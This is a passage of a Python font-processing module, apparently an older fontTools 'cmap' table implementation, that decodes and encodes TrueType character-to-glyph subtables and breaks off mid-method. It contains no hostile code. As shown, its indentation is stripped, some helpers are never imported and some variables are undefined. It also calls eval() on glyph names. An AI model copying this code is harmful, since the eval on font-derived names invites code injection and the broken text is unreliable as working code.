from fontTools.ttLib import getSearchRange
from fontTools.unicode import Unicode
from . import DefaultTable
import sys
import struct
import array
import operator
class table__c_m_a_p(DefaultTable.DefaultTable):
def getcmap(self, platformID, platEncID):
for subtable in self.tables:
if (subtable.platformID == platformID and
subtable.platEncID == platEncID):
return subtable
return None # not found
def decompile(self, data, ttFont):
tableVersion, numSubTables = struct.unpack(">HH", data[:4])
self.tableVersion = int(tableVersion)
self.tables = tables = []
seenOffsets = {}
for i in range(numSubTables):
platformID, platEncID, offset = struct.unpack(
">HHl", data[4+i*8:4+(i+1)*8])
platformID, platEncID = int(platformID), int(platEncID)
format, length = struct.unpack(">HH", data[offset:offset+4])
if format in [8,10,12,13]:
format, reserved, length = struct.unpack(">HHL", data[offset:offset+8])
elif format in [14]:
format, length = struct.unpack(">HL", data[offset:offset+6])
if not length:
print("Error: cmap subtable is reported as having zero length: platformID %s, platEncID %s, format %s offset %s. Skipping table." % (platformID, platEncID,format, offset))
continue
if format not in cmap_classes:
table = cmap_format_unknown(format)
else:
table = cmap_classes[format](format)
table.platformID = platformID
table.platEncID = platEncID
# Note that by default we decompile only the subtable header info;
# any other data gets decompiled only when an attribute of the
# subtable is referenced.
table.decompileHeader(data[offset:offset+int(length)], ttFont)
if offset in seenOffsets:
table.cmap = tables[seenOffsets[offset]].cmap
else:
seenOffsets[offset] = i
tables.append(table)
def compile(self, ttFont):
self.tables.sort() # sort according to the spec; see CmapSubtable.__lt__()
numSubTables = len(self.tables)
totalOffset = 4 + 8 * numSubTables
data = struct.pack(">HH", self.tableVersion, numSubTables)
tableData = b""
seen = {} # Some tables are the same object reference. Don't compile them twice.
done = {} # Some tables are different objects, but compile to the same data chunk
for table in self.tables:
try:
offset = seen[id(table.cmap)]
except KeyError:
chunk = table.compile(ttFont)
if chunk in done:
offset = done[chunk]
else:
offset = seen[id(table.cmap)] = done[chunk] = totalOffset + len(tableData)
tableData = tableData + chunk
data = data + struct.pack(">HHl", table.platformID, table.platEncID, offset)
return data + tableData
def toXML(self, writer, ttFont):
writer.simpletag("tableVersion", version=self.tableVersion)
writer.newline()
for table in self.tables:
table.toXML(writer, ttFont)
def fromXML(self, name, attrs, content, ttFont):
if name == "tableVersion":
self.tableVersion = safeEval(attrs["version"])
return
if name[:12] != "cmap_format_":
return
if not hasattr(self, "tables"):
self.tables = []
format = safeEval(name[12:])
if format not in cmap_classes:
table = cmap_format_unknown(format)
else:
table = cmap_classes[format](format)
table.platformID = safeEval(attrs["platformID"])
table.platEncID = safeEval(attrs["platEncID"])
table.fromXML(name, attrs, content, ttFont)
self.tables.append(table)
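# Minimal usage sketch (assumes fontTools is installed; "MyFont.ttf" is a
# hypothetical font path): a 'cmap' table is normally reached through
# fontTools.ttLib.TTFont, and getcmap(3, 1) above returns the Windows Unicode
# BMP subtable, whose .cmap dict maps code points to glyph names.
#
#     from fontTools.ttLib import TTFont
#     font = TTFont("MyFont.ttf")
#     subtable = font["cmap"].getcmap(3, 1)
#     if subtable is not None:
#         print(subtable.cmap.get(ord("A")))   # glyph name mapped to U+0041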
class CmapSubtable(object):
def __init__(self, format):
self.format = format
self.data = None
self.ttFont = None
def __getattr__(self, attr):
# allow lazy decompilation of subtables.
if attr[:2] == '__': # don't handle requests for member functions like '__lt__'
raise AttributeError(attr)
if self.data is None:
raise AttributeError(attr)
self.decompile(None, None) # use saved data.
self.data = None # Once this table has been decompiled, make sure we don't
# just return the original data. Also avoids recursion when
# called with an attribute that the cmap subtable doesn't have.
return getattr(self, attr)
def decompileHeader(self, data, ttFont):
format, length, language = struct.unpack(">HHH", data[:6])
assert len(data) == length, "corrupt cmap table format %d (data length: %d, header length: %d)" % (format, len(data), length)
self.format = int(format)
self.length = int(length)
self.language = int(language)
self.data = data[6:]
self.ttFont = ttFont
def toXML(self, writer, ttFont):
writer.begintag(self.__class__.__name__, [
("platformID", self.platformID),
("platEncID", self.platEncID),
("language", self.language),
])
writer.newline()
codes = sorted(self.cmap.items())
self._writeCodes(codes, writer)
writer.endtag(self.__class__.__name__)
writer.newline()
def isUnicode(self):
return (self.platformID == 0 or
(self.platformID == 3 and self.platEncID in [1, 10]))
def isSymbol(self):
return self.platformID == 3 and self.platEncID == 0
def _writeCodes(self, codes, writer):
isUnicode = self.isUnicode()
for code, name in codes:
writer.simpletag("map", code=hex(code), name=name)
if isUnicode:
writer.comment(Unicode[code])
writer.newline()
def __lt__(self, other):
if not isinstance(other, CmapSubtable):
return NotImplemented
# implemented so that list.sort() sorts according to the spec.
selfTuple = (
getattr(self, "platformID", None),
getattr(self, "platEncID", None),
getattr(self, "language", None),
self.__dict__)
otherTuple = (
getattr(other, "platformID", None),
getattr(other, "platEncID", None),
getattr(other, "language", None),
other.__dict__)
return selfTuple < otherTuple
class cmap_format_0(CmapSubtable):
def decompile(self, data, ttFont):
# we usually get here indirectly from the subtable __getattr__ function, in which case both args must be None.
# If not, someone is calling the subtable decompile() directly, and must provide both args.
if data is not None and ttFont is not None:
self.decompileHeader(data[offset:offset+int(length)], ttFont)
else:
assert (data is None and ttFont is None), "Need both data and ttFont arguments"
data = self.data # decompileHeader assigns the data after the header to self.data
assert 262 == self.length, "Format 0 cmap subtable not 262 bytes"
glyphIdArray = array.array("B")
glyphIdArray.fromstring(self.data)
self.cmap = cmap = {}
lenArray = len(glyphIdArray)
charCodes = list(range(lenArray))
names = map(self.ttFont.getGlyphName, glyphIdArray)
list(map(operator.setitem, [cmap]*lenArray, charCodes, names))
def compile(self, ttFont):
if self.data:
return struct.pack(">HHH", 0, 262, self.language) + self.data
charCodeList = sorted(self.cmap.items())
charCodes = [entry[0] for entry in charCodeList]
valueList = [entry[1] for entry in charCodeList]
assert charCodes == list(range(256))
valueList = map(ttFont.getGlyphID, valueList)
glyphIdArray = array.array("B", valueList)
data = struct.pack(">HHH", 0, 262, self.language) + glyphIdArray.tostring()
assert len(data) == 262
return data
def fromXML(self, name, attrs, content, ttFont):
self.language = safeEval(attrs["language"])
if not hasattr(self, "cmap"):
self.cmap = {}
cmap = self.cmap
for element in content:
if not isinstance(element, tuple):
continue
name, attrs, content = element
if name != "map":
continue
cmap[safeEval(attrs["code"])] = attrs["name"]
subHeaderFormat = ">HHhH"
class SubHeader(object):
def __init__(self):
self.firstCode = None
self.entryCount = None
self.idDelta = None
self.idRangeOffset = None
self.glyphIndexArray = []
class cmap_format_2(CmapSubtable):
def setIDDelta(self, subHeader):
subHeader.idDelta = 0
# find the minGI which is not zero.
minGI = subHeader.glyphIndexArray[0]
for gid in subHeader.glyphIndexArray:
if (gid != 0) and (gid < minGI):
minGI = gid
# The lowest gid in glyphIndexArray, after subtracting idDelta, must be 1.
# idDelta is a short, and must be between -32K and 32K. minGI can be between 1 and 64K.
# We would like to pick an idDelta such that the first glyphArray GID is 1,
# so that we are more likely to be able to combine glypharray GID subranges.
# This means that we have a problem when minGI is > 32K
# Since the final gi is reconstructed from the glyphArray GID by:
# (short)finalGID = (gid + idDelta) % 0x10000),
# we can get from a glypharray GID of 1 to a final GID of 65K by subtracting 2, and casting the
# negative number to an unsigned short.
if (minGI > 1):
if minGI > 0x7FFF:
subHeader.idDelta = -(0x10000 - minGI) -1
else:
subHeader.idDelta = minGI -1
idDelta = subHeader.idDelta
for i in range(subHeader.entryCount):
gid = subHeader.glyphIndexArray[i]
if gid > 0:
subHeader.glyphIndexArray[i] = gid - idDelta
def decompile(self, data, ttFont):
# we usually get here indirectly from the subtable __getattr__ function, in which case both args must be None.
# If not, someone is calling the subtable decompile() directly, and must provide both args.
if data is not None and ttFont is not None:
self.decompileHeader(data[offset:offset+int(length)], ttFont)
else:
assert (data is None and ttFont is None), "Need both data and ttFont arguments"
data = self.data # decompileHeader assigns the data after the header to self.data
subHeaderKeys = []
maxSubHeaderindex = 0
# get the key array, and determine the number of subHeaders.
allKeys = array.array("H")
allKeys.fromstring(data[:512])
data = data[512:]
if sys.byteorder != "big":
allKeys.byteswap()
subHeaderKeys = [ key//8 for key in allKeys]
maxSubHeaderindex = max(subHeaderKeys)
#Load subHeaders
subHeaderList = []
pos = 0
for i in range(maxSubHeaderindex + 1):
subHeader = SubHeader()
(subHeader.firstCode, subHeader.entryCount, subHeader.idDelta, \
subHeader.idRangeOffset) = struct.unpack(subHeaderFormat, data[pos:pos + 8])
pos += 8
giDataPos = pos + subHeader.idRangeOffset-2
giList = array.array("H")
giList.fromstring(data[giDataPos:giDataPos + subHeader.entryCount*2])
if sys.byteorder != "big":
giList.byteswap()
subHeader.glyphIndexArray = giList
subHeaderList.append(subHeader)
# How this gets processed.
# Charcodes may be one or two bytes.
# The first byte of a charcode is mapped through the subHeaderKeys, to select
# a subHeader. For any subheader but 0, the next byte is then mapped through the
# selected subheader. If subheader Index 0 is selected, then the byte itself is
# mapped through the subheader, and there is no second byte.
# Then assume that the subsequent byte is the first byte of the next charcode,and repeat.
#
# Each subheader references a range in the glyphIndexArray whose length is entryCount.
# The range in glyphIndexArray referenced by a subheader may overlap with the range in glyphIndexArray
# referenced by another subheader.
# The only subheader that will be referenced by more than one first-byte value is the subheader
# that maps the entire range of glyphID values to glyphIndex 0, e.g notdef:
# {firstChar 0, EntryCount 0,idDelta 0,idRangeOffset xx}
# A byte being mapped though a subheader is treated as in index into a mapping of array index to font glyphIndex.
# A subheader specifies a subrange within (0...256) by the
# firstChar and EntryCount values. If the byte value is outside the subrange, then the glyphIndex is zero
# (e.g. glyph not in font).
# If the byte index is in the subrange, then an offset index is calculated as (byteIndex - firstChar).
# The index to glyphIndex mapping is a subrange of the glyphIndexArray. You find the start of the subrange by
# counting idRangeOffset bytes from the idRangeOffset word. The first value in this subrange is the
# glyphIndex for the index firstChar. The offset index should then be used in this array to get the glyphIndex.
# Example for Logocut-Medium
# first byte of charcode = 129; selects subheader 1.
# subheader 1 = {firstChar 64, EntryCount 108,idDelta 42,idRangeOffset 0252}
# second byte of charCode = 66
# the index offset = 66-64 = 2.
# The subrange of the glyphIndexArray starting at 0x0252 bytes from the idRangeOffset word is:
# [glyphIndexArray index], [subrange array index] = glyphIndex
# [256], [0]=1 from charcode [129, 64]
# [257], [1]=2 from charcode [129, 65]
# [258], [2]=3 from charcode [129, 66]
# [259], [3]=4 from charcode [129, 67]
# So, the glyphIndex = 3 from the array. Then if idDelta is not zero and the glyph ID is not zero,
# add it to the glyphID to get the final glyphIndex
# value. In this case the final glyph index = 3+ 42 -> 45 for the final glyphIndex. Whew!
self.data = b""
self.cmap = cmap = {}
notdefGI = 0
for firstByte in range(256):
subHeadindex = subHeaderKeys[firstByte]
subHeader = subHeaderList[subHeadindex]
if subHeadindex == 0:
if (firstByte < subHeader.firstCode) or (firstByte >= subHeader.firstCode + subHeader.entryCount):
continue # gi is notdef.
else:
charCode = firstByte
offsetIndex = firstByte - subHeader.firstCode
gi = subHeader.glyphIndexArray[offsetIndex]
if gi != 0:
gi = (gi + subHeader.idDelta) % 0x10000
else:
continue # gi is notdef.
cmap[charCode] = gi
else:
if subHeader.entryCount:
charCodeOffset = firstByte * 256 + subHeader.firstCode
for offsetIndex in range(subHeader.entryCount):
charCode = charCodeOffset + offsetIndex
gi = subHeader.glyphIndexArray[offsetIndex]
if gi != 0:
gi = (gi + subHeader.idDelta) % 0x10000
else:
continue
cmap[charCode] = gi
# If not subHeader.entryCount, then all char codes with this first byte are
# mapped to .notdef. We can skip this subtable, and leave the glyphs un-encoded, which is the
# same as mapping it to .notdef.
# cmap values are GID's.
glyphOrder = self.ttFont.getGlyphOrder()
gids = list(cmap.values())
charCodes = list(cmap.keys())
lenCmap = len(gids)
try:
names = list(map(operator.getitem, [glyphOrder]*lenCmap, gids ))
except IndexError:
getGlyphName = self.ttFont.getGlyphName
names = list(map(getGlyphName, gids ))
list(map(operator.setitem, [cmap]*lenCmap, charCodes, names))
def compile(self, ttFont):
if self.data:
return struct.pack(">HHH", self.format, self.length, self.language) + self.data
kEmptyTwoCharCodeRange = -1
notdefGI = 0
items = sorted(self.cmap.items())
charCodes = [item[0] for item in items]
names = [item[1] for item in items]
nameMap = ttFont.getReverseGlyphMap()
lenCharCodes = len(charCodes)
try:
gids = list(map(operator.getitem, [nameMap]*lenCharCodes, names))
except KeyError:
nameMap = ttFont.getReverseGlyphMap(rebuild=True)
try:
gids = list(map(operator.getitem, [nameMap]*lenCharCodes, names))
except KeyError:
# allow virtual GIDs in format 2 tables
gids = []
for name in names:
try:
gid = nameMap[name]
except KeyError:
try:
if (name[:3] == 'gid'):
gid = eval(name[3:])
else:
gid = ttFont.getGlyphID(name)
except:
raise KeyError(name)
gids.append(gid)
# Process the (char code to gid) item list in char code order.
# By definition, all one byte char codes map to subheader 0.
# For all the two byte char codes, we assume that the first byte maps to the empty subhead (with an entry count of 0,
# which defines all char codes in its range to map to notdef) unless proven otherwise.
# Note that since the char code items are processed in char code order, all the char codes with the
# same first byte are in sequential order.
subHeaderKeys = [ kEmptyTwoCharCodeRange for x in range(256)] # list of indices into subHeaderList.
subHeaderList = []
# We force this subheader entry 0 to exist in the subHeaderList in the case where some one comes up
# with a cmap where all the one byte char codes map to notdef,
# with the result that the subhead 0 would not get created just by processing the item list.
charCode = charCodes[0]
if charCode > 255:
subHeader = SubHeader()
subHeader.firstCode = 0
subHeader.entryCount = 0
subHeader.idDelta = 0
subHeader.idRangeOffset = 0
subHeaderList.append(subHeader)
lastFirstByte = -1
items = zip(charCodes, gids)
for charCode, gid in items:
if gid == 0:
continue
firstbyte = charCode >> 8
secondByte = charCode & 0x00FF
if firstbyte != lastFirstByte: # Need to update the current subhead, and start a new one.
if lastFirstByte > -1:
# fix GI's and iDelta of current subheader.
self.setIDDelta(subHeader)
# If it was subheader 0 for one-byte charCodes, then we need to set the subHeaderKeys value to zero
# for the indices matching the char codes.
if lastFirstByte == 0:
for index in range(subHeader.entryCount):
charCode = subHeader.firstCode + index
subHeaderKeys[charCode] = 0
assert (subHeader.entryCount == len(subHeader.glyphIndexArray)), "Error - subhead entry count does not match len of glyphID subrange."
# init new subheader
subHeader = SubHeader()
subHeader.firstCode = secondByte
subHeader.entryCount = 1
subHeader.glyphIndexArray.append(gid)
subHeaderList.append(subHeader)
subHeaderKeys[firstbyte] = len(subHeaderList) -1
lastFirstByte = firstbyte
else:
# need to fill in with notdefs all the code points between the last charCode and the current charCode.
codeDiff = secondByte - (subHeader.firstCode + subHeader.entryCount)
for i in range(codeDiff):
subHeader.glyphIndexArray.append(notdefGI)
subHeader.glyphIndexArray.append(gid)
subHeader.entryCount = subHeader.entryCount + codeDiff + 1
# fix GI's and iDelta of last subheader that we added to the subheader array.
self.setIDDelta(subHeader)
# Now we add a final subheader for the subHeaderKeys which maps to empty two byte charcode ranges.
subHeader = SubHeader()
subHeader.firstCode = 0
subHeader.entryCount = 0
subHeader.idDelta = 0
subHeader.idRangeOffset = 2
subHeaderList.append(subHeader)
emptySubheadIndex = len(subHeaderList) - 1
for index in range(256):
if subHeaderKeys[index] == kEmptyTwoCharCodeRange:
subHeaderKeys[index] = emptySubheadIndex
# Since this is the last subheader, the GlyphIndex Array starts two bytes after the start of the
# idRangeOffset word of this subHeader. We can safely point to the first entry in the GlyphIndexArray,
# since the first subrange of the GlyphIndexArray is for subHeader 0, which always starts with
# charcode 0 and GID 0.
idRangeOffset = (len(subHeaderList)-1)*8 + 2 # offset to beginning of glyphIDArray from first subheader idRangeOffset.
subheadRangeLen = len(subHeaderList) -1 # skip last special empty-set subheader; we've already hardcoded its idRangeOffset to 2.
for index in range(subheadRangeLen):
subHeader = subHeaderList[index]
subHeader.idRangeOffset = 0
for j in range(index):
prevSubhead = subHeaderList[j]
if prevSubhead.glyphIndexArray == subHeader.glyphIndexArray: # use the glyphIndexArray subarray
subHeader.idRangeOffset = prevSubhead.idRangeOffset - (index-j)*8
subHeader.glyphIndexArray = []
break
if subHeader.idRangeOffset == 0: # didn't find one.
subHeader.idRangeOffset = idRangeOffset
idRangeOffset = (idRangeOffset - 8) + subHeader.entryCount*2 # one less subheader, one more subArray.
else:
idRangeOffset = idRangeOffset - 8 # one less subheader
# Now we can write out the data!
length = 6 + 512 + 8*len(subHeaderList) # header, 256 subHeaderKeys, and subheader array.
for subhead in subHeaderList[:-1]:
length = length + len(subhead.glyphIndexArray)*2 # We can't use subhead.entryCount, as some of the subhead may share subArrays.
dataList = [struct.pack(">HHH", 2, length, self.language)]
for index in subHeaderKeys:
dataList.append(struct.pack(">H", index*8))
for subhead in subHeaderList:
dataList.append(struct.pack(subHeaderFormat, subhead.firstCode, subhead.entryCount, subhead.idDelta, subhead.idRangeOffset))
for subhead in subHeaderList[:-1]:
for gi in subhead.glyphIndexArray:
dataList.append(struct.pack(">H", gi))
data = bytesjoin(dataList)
assert (len(data) == length), "Error: cmap format 2 is not same length as calculated! actual: " + str(len(data))+ " calc : " + str(length)
return data
def fromXML(self, name, attrs, content, ttFont):
self.language = safeEval(attrs["language"])
if not hasattr(self, "cmap"):
self.cmap = {}
cmap = self.cmap
for element in content:
if not isinstance(element, tuple):
continue
name, attrs, content = element
if name != "map":
continue
cmap[safeEval(attrs["code"])] = attrs["name"]
cmap_format_4_format = ">7H"
#uint16 endCode[segCount] # Ending character code for each segment, last = 0xFFFF.
#uint16 reservedPad # This value should be zero
#uint16 startCode[segCount] # Starting character code for each segment
#uint16 idDelta[segCount] # Delta for all character codes in segment
#uint16 idRangeOffset[segCount] # Offset in bytes to glyph indexArray, or 0
#uint16 glyphIndexArray[variable] # Glyph index array
def splitRange(startCode, endCode, cmap):
# Try to split a range of character codes into subranges with consecutive
# glyph IDs in such a way that the cmap4 subtable can be stored "most"
# efficiently. I can't prove I've got the optimal solution, but it seems
# to do well with the fonts I tested: none became bigger, many became smaller.
if startCode == endCode:
return [], [endCode]
lastID = cmap[startCode]
lastCode = startCode
inOrder = None
orderedBegin = None
subRanges = []
# Gather subranges in which the glyph IDs are consecutive.
for code in range(startCode + 1, endCode + 1):
glyphID = cmap[code]
if glyphID - 1 == lastID:
if inOrder is None or not inOrder:
inOrder = 1
orderedBegin = lastCode
else:
if inOrder:
inOrder = 0
subRanges.append((orderedBegin, lastCode))
orderedBegin = None
lastID = glyphID
lastCode = code
if inOrder:
subRanges.append((orderedBegin, lastCode))
assert lastCode == endCode
# Now filter out those new subranges that would only make the data bigger.
# A new segment cost 8 bytes, not using a new segment costs 2 bytes per
# character.
newRanges = []
for b, e in subRanges:
if b == startCode and e == endCode:
break # the whole range, we're fine
if b == startCode or e == endCode:
threshold = 4 # split costs one more segment
else:
threshold = 8 # split costs two more segments
if (e - b + 1) > threshold:
newRanges.append((b, e))
subRanges = newRanges
if not subRanges:
return [], [endCode]
if subRanges[0][0] != startCode:
subRanges.insert(0, (startCode, subRanges[0][0] - 1))
if subRanges[-1][1] != endCode:
subRanges.append((subRanges[-1][1] + 1, endCode))
# Fill the "holes" in the segments list -- those are the segments in which
# the glyph IDs are _not_ consecutive.
i = 1
while i < len(subRanges):
if subRanges[i-1][1] + 1 != subRanges[i][0]:
subRanges.insert(i, (subRanges[i-1][1] + 1, subRanges[i][0] - 1))
i = i + 1
i = i + 1
# Transform the ranges into startCode/endCode lists.
start = []
end = []
for b, e in subRanges:
start.append(b)
end.append(e)
start.pop(0)
assert len(start) + 1 == len(end)
return start, end
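# Minimal invocation sketch for splitRange (toy values, purely illustrative):
# given a code->glyphID mapping, it proposes additional segment boundaries inside
# [startCode, endCode] so that runs of consecutive glyph IDs can be encoded with
# idDelta alone. 'end' closes each proposed segment; 'start' opens every segment
# after the first, so len(start) + 1 == len(end) (see the assert above).
#
#     toy_cmap = {0x61: 5, 0x62: 6, 0x63: 7, 0x64: 300, 0x65: 9}
#     extra_starts, ends = splitRange(0x61, 0x65, toy_cmap)
#     assert len(extra_starts) + 1 == len(ends)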
class cmap_format_4(CmapSubtable):
def decompile(self, data, ttFont):
# we usually get here indirectly from the subtable __getattr__ function, in which case both args must be None.
# If not, someone is calling the subtable decompile() directly, and must provide both args.
if data is not None and ttFont is not None:
self.decompileHeader(self.data[offset:offset+int(length)], ttFont)
else:
assert (data is None and ttFont is None), "Need both data and ttFont arguments"
data = self.data # decompileHeader assigns the data after the header to self.data
(segCountX2, searchRange, entrySelector, rangeShift) = \
struct.unpack(">4H", data[:8])
data = data[8:]
segCount = segCountX2 // 2
allCodes = array.array("H")
allCodes.fromstring(data)
self.data = data = None
if sys.byteorder != "big":
allCodes.byteswap()
# divide the data
endCode = allCodes[:segCount]
allCodes = allCodes[segCount+1:] # the +1 is skipping the reservedPad field
startCode = allCodes[:segCount]
allCodes = allCodes[segCount:]
idDelta = allCodes[:segCount]
allCodes = allCodes[segCount:]
idRangeOffset = allCodes[:segCount]
glyphIndexArray = allCodes[segCount:]
lenGIArray = len(glyphIndexArray)
# build 2-byte character mapping
charCodes = []
gids = []
for i in range(len(startCode) - 1): # don't do 0xffff!
start = startCode[i]
delta = idDelta[i]
rangeOffset = idRangeOffset[i]
# *someone* needs to get killed.
partial = rangeOffset // 2 - start + i - len(idRangeOffset)
rangeCharCodes = list(range(startCode[i], endCode[i] + 1))
charCodes.extend(rangeCharCodes)
if rangeOffset == 0:
gids.extend([(charCode + delta) & 0xFFFF for charCode in rangeCharCodes])
else:
for charCode in rangeCharCodes:
index = charCode + partial
assert (index < lenGIArray), "In format 4 cmap, range (%d), the calculated index (%d) into the glyph index array is not less than the length of the array (%d) !" % (i, index, lenGIArray)
if glyphIndexArray[index] != 0: # if not missing glyph
glyphID = glyphIndexArray[index] + delta
else:
glyphID = 0 # missing glyph
gids.append(glyphID & 0xFFFF)
self.cmap = cmap = {}
lenCmap = len(gids)
glyphOrder = self.ttFont.getGlyphOrder()
try:
names = list(map(operator.getitem, [glyphOrder]*lenCmap, gids ))
except IndexError:
getGlyphName = self.ttFont.getGlyphName
names = list(map(getGlyphName, gids ))
list(map(operator.setitem, [cmap]*lenCmap, charCodes, names))
def compile(self, ttFont):
if self.data:
return struct.pack(">HHH", self.format, self.length, self.language) + self.data
charCodes = list(self.cmap.keys())
lenCharCodes = len(charCodes)
if lenCharCodes == 0:
startCode = [0xffff]
endCode = [0xffff]
else:
charCodes.sort()
names = list(map(operator.getitem, [self.cmap]*lenCharCodes, charCodes))
nameMap = ttFont.getReverseGlyphMap()
try:
gids = list(map(operator.getitem, [nameMap]*lenCharCodes, names))
except KeyError:
nameMap = ttFont.getReverseGlyphMap(rebuild=True)
try:
gids = list(map(operator.getitem, [nameMap]*lenCharCodes, names))
except KeyError:
# allow virtual GIDs in format 4 tables
gids = []
for name in names:
try:
gid = nameMap[name]
except KeyError:
try:
if (name[:3] == 'gid'):
gid = eval(name[3:])
else:
gid = ttFont.getGlyphID(name)
except:
raise KeyError(name)
gids.append(gid)
cmap = {} # code:glyphID mapping
list(map(operator.setitem, [cmap]*len(charCodes), charCodes, gids))
# Build startCode and endCode lists.
# Split the char codes in ranges of consecutive char codes, then split
# each range in more ranges of consecutive/not consecutive glyph IDs.
# See splitRange().
lastCode = charCodes[0]
endCode = []
startCode = [lastCode]
for charCode in charCodes[1:]: # skip the first code, it's the first start code
if charCode == lastCode + 1:
lastCode = charCode
continue
start, end = splitRange(startCode[-1], lastCode, cmap)
startCode.extend(start)
endCode.extend(end)
startCode.append(charCode)
lastCode = charCode
endCode.append(lastCode)
startCode.append(0xffff)
endCode.append(0xffff)
# build up rest of cruft
idDelta = []
idRangeOffset = []
glyphIndexArray = []
for i in range(len(endCode)-1): # skip the closing codes (0xffff)
indices = []
for charCode in range(startCode[i], endCode[i] + 1):
indices.append(cmap[charCode])
if (indices == list(range(indices[0], indices[0] + len(indices)))):
idDelta.append((indices[0] - startCode[i]) % 0x10000)
idRangeOffset.append(0)
else:
# someone *definitely* needs to get killed.
idDelta.append(0)
idRangeOffset.append(2 * (len(endCode) + len(glyphIndexArray) - i))
glyphIndexArray.extend(indices)
idDelta.append(1) # 0xffff + 1 == (tadaa!) 0. So this end code maps to .notdef
idRangeOffset.append(0)
# Insane.
segCount = len(endCode)
segCountX2 = segCount * 2
searchRange, entrySelector, rangeShift = getSearchRange(segCount, 2)
charCodeArray = array.array("H", endCode + [0] + startCode)
idDeltaArray = array.array("H", idDelta)
restArray = array.array("H", idRangeOffset + glyphIndexArray)
if sys.byteorder != "big":
charCodeArray.byteswap()
idDeltaArray.byteswap()
restArray.byteswap()
data = charCodeArray.tostring() + idDeltaArray.tostring() + restArray.tostring()
length = struct.calcsize(cmap_format_4_format) + len(data)
header = struct.pack(cmap_format_4_format, self.format, length, self.language,
segCountX2, searchRange, entrySelector, rangeShift)
return header + data
def fromXML(self, name, attrs, content, ttFont):
self.language = safeEval(attrs["language"])
if not hasattr(self, "cmap"):
self.cmap = {}
cmap = self.cmap
for element in content:
if not isinstance(element, tuple):
continue
nameMap, attrsMap, dummyContent = element
if nameMap != "map":
assert 0, "Unrecognized keyword in cmap subtable"
cmap[safeEval(attrsMap["code"])] = attrsMap["name"]
class cmap_format_6(CmapSubtable):
def decompile(self, data, ttFont):
# we usually get here indirectly from the subtable __getattr__ function, in which case both args must be None.
# If not, someone is calling the subtable decompile() directly, and must provide both args.
if data is not None and ttFont is not None:
self.decompileHeader(data[offset:offset+int(length)], ttFont)
else:
assert (data is None and ttFont is None), "Need both data and ttFont arguments"
data = self.data # decompileHeader assigns the data after the header to self.data
firstCode, entryCount = struct.unpack(">HH", data[:4])
firstCode = int(firstCode)
data = data[4:]
#assert len(data) == 2 * entryCount # XXX not true in Apple's Helvetica!!!
glyphIndexArray = array.array("H")
glyphIndexArray.fromstring(data[:2 * int(entryCount)])
if sys.byteorder != "big":
glyphIndexArray.byteswap()
self.data = data = None
self.cmap = cmap = {}
lenArray = len(glyphIndexArray)
charCodes = list(range(firstCode, firstCode + lenArray))
glyphOrder = self.ttFont.getGlyphOrder()
try:
names = list(map(operator.getitem, [glyphOrder]*lenArray, glyphIndexArray ))
except IndexError:
getGlyphName = self.ttFont.getGlyphName
names = list(map(getGlyphName, glyphIndexArray ))
list(map(operator.setitem, [cmap]*lenArray, charCodes, names))
def compile(self, ttFont):
if self.data:
return struct.pack(">HHH", self.format, self.length, self.language) + self.data
cmap = self.cmap
codes = list(cmap.keys())
if codes: # yes, there are empty cmap tables.
codes = list(range(codes[0], codes[-1] + 1))
firstCode = codes[0]
valueList = [cmap.get(code, ".notdef") for code in codes]
valueList = map(ttFont.getGlyphID, valueList)
glyphIndexArray = array.array("H", valueList)
if sys.byteorder != "big":
glyphIndexArray.byteswap()
data = glyphIndexArray.tostring()
else:
data = b""
firstCode = 0
header = struct.pack(">HHHHH",
6, len(data) + 10, self.language, firstCode, len(codes))
return header + data
def fromXML(self, name, attrs, content, ttFont):
self.language = safeEval(attrs["language"])
if not hasattr(self, "cmap"):
self.cmap = {}
cmap = self.cmap
for element in content:
if not isinstance(element, tuple):
continue
name, attrs, content = element
if name != "map":
continue
cmap[safeEval(attrs["code"])] = attrs["name"]
class cmap_format_12_or_13(CmapSubtable):
def __init__(self, format):
self.format = format
self.reserved = 0
self.data = None
self.ttFont = None
def decompileHeader(self, data, ttFont):
format, reserved, length, language, nGroups = struct.unpack(">HHLLL", data[:16])
assert len(data) == (16 + nGroups*12) == (length), "corrupt cmap table format %d (data length: %d, header length: %d)" % (format, len(data), length)
self.format = format
self.reserved = reserved
self.length = length
self.language = language
self.nGroups = nGroups
self.data = data[16:]
self.ttFont = ttFont
def decompile(self, data, ttFont):
# we usually get here indirectly from the subtable __getattr__ function, in which case both args must be None.
# If not, someone is calling the subtable decompile() directly, and must provide both args.
if data is not None and ttFont is not None:
self.decompileHeader(data[offset:offset+int(length)], ttFont)
else:
assert (data is None and ttFont is None), "Need both data and ttFont arguments"
data = self.data # decompileHeader assigns the data after the header to self.data
charCodes = []
gids = []
pos = 0
for i in range(self.nGroups):
startCharCode, endCharCode, glyphID = struct.unpack(">LLL",data[pos:pos+12] )
pos += 12
lenGroup = 1 + endCharCode - startCharCode
charCodes.extend(list(range(startCharCode, endCharCode +1)))
gids.extend(self._computeGIDs(glyphID, lenGroup))
self.data = data = None
self.cmap = cmap = {}
lenCmap = len(gids)
glyphOrder = self.ttFont.getGlyphOrder()
try:
names = list(map(operator.getitem, [glyphOrder]*lenCmap, gids ))
except IndexError:
getGlyphName = self.ttFont.getGlyphName
names = list(map(getGlyphName, gids ))
list(map(operator.setitem, [cmap]*lenCmap, charCodes, names))
def compile(self, ttFont):
if self.data:
return struct.pack(">HHLLL", self.format, self.reserved, self.length, self.language, self.nGroups) + self.data
charCodes = list(self.cmap.keys())
lenCharCodes = len(charCodes)
names = list(self.cmap.values())
nameMap = ttFont.getReverseGlyphMap()
try:
gids = list(map(operator.getitem, [nameMap]*lenCharCodes, names))
except KeyError:
nameMap = ttFont.getReverseGlyphMap(rebuild=True)
try:
gids = list(map(operator.getitem, [nameMap]*lenCharCodes, names))
except KeyError:
# allow virtual GIDs in format 12 tables
gids = []
for name in names:
try:
gid = nameMap[name]
except KeyError:
try:
if (name[:3] == 'gid'):
gid = eval(name[3:])
else:
gid = ttFont.getGlyphID(name)
except:
raise KeyError(name)
gids.append(gid)
cmap = {} # code:glyphID mapping
list(map(operator.setitem, [cmap]*len(charCodes), charCodes, gids))
charCodes.sort()
index = 0
startCharCode = charCodes[0]
startGlyphID = cmap[startCharCode]
lastGlyphID = startGlyphID - self._format_step
lastCharCode = startCharCode - 1
nGroups = 0
dataList = []
maxIndex = len(charCodes)
for index in range(maxIndex):
charCode = charCodes[index]
glyphID = cmap[charCode]
if not self._IsInSameRun(glyphID, lastGlyphID, charCode, lastCharCode):
dataList.append(struct.pack(">LLL", startCharCode, lastCharCode, startGlyphID))
startCharCode = charCode
startGlyphID = glyphID
nGroups = nGroups + 1
lastGlyphID = glyphID
lastCharCode = charCode
